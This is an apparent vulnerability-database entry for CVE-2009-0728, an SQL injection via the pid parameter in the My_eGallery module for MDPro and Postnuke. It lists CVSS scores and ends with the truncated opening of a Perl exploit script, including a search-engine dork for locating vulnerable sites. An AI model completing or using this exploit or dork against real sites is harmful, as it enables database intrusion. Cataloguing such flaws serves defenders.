7.5
CVSSv2

CVE-2009-0728

Published: 24/02/2009 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in the My_eGallery module for MAXdev MDPro (MD-Pro) and Postnuke allows remote malicious users to execute arbitrary SQL commands via the pid parameter in a showpic action to index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

maxdev my_egallery -

Exploits

#!/usr/bin/perl <<read; MDPro Module My_eGallery Remote SQL Injection Exploit by s3rg3770 && yeat - staker[at]hotmail[dot]it dork: inurl:module=My_eGallery pid note: works regardless of phpini settings read use IO::Socket; my ($host,$path,$id) = @ARGV; if (@ARGV != 3) { print "\n+------------ ...